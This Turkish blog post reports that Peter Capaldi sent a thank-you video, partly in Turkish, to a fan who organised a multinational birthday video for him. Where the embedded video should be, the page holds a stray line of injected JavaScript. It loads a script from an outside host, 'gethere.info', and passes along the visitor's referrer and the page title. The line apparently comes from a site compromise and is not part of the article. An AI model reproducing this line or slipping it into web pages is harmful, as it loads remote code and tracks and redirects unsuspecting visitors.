Peter Capaldi'den Türkçe Mesaj Var | Dijital Arkeolog

Peter Capaldi’den Türkçe Mesaj Var

Doctor Who dizi evreninin 12.doktoru olarak 8.sezondan beri dizide oynayan başarılı oyuncu Peter Capaldi, Türk bir hayranı için teşekkür mesajı yayınladı.
peter capaldi türkçe

Doctor Who dizisinin Türk bir hayranı olan Naz EnginlerCapaldi‘nin doğum günü (14 Nisan 1958) sebebiyle “Birthday Project 2k15” adı altında bir proje girişiminde bulundu. Projenin amacı dünyanın bir çok ülkesinden Doctor Who fanlarının hazırlayacağı ve daha sonra tek video halinde Peter Capaldi‘ye iletilecek bir doğum günü mesajı videosu hazırlamaktı. Naz’ın projesi başarılı bir şekilde tamamlanarak, Capaldi‘ye ulaştırıldı.


Aradan geçen bir kaç aylık zamandan sonra Capaldi‘den bir teşekkür videosu geldi. Capaldi videoda çok mutlu olduğunu ifade ederek, videoda yer alanlara teşekkür mesajlarını kendi dillerinde cümlelerle tek tek iletti. E tabi videonun girişimcisi Naz Enginler‘in teşekkür mesajı da Türkçe oldu. İşte o iki video;

Naz Enginler girişiminde hazırlanan Birthday Project 2k15 videosu;


Peter Capaldi’nin yayımladığı Mesaj;

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kategoriler
Uncategorized

Blog Yazarı / Mizah Düşkünü / Viral Pazarlama Meraklısı / Editör / Tespitolog / Metin Yazarı / Gezgin / BTTF - Lara Croft - İndiana Jones / Before Sunrise - Before Sunset - Before Midnight ;)
Güncel Haberler

İlgili Yazılar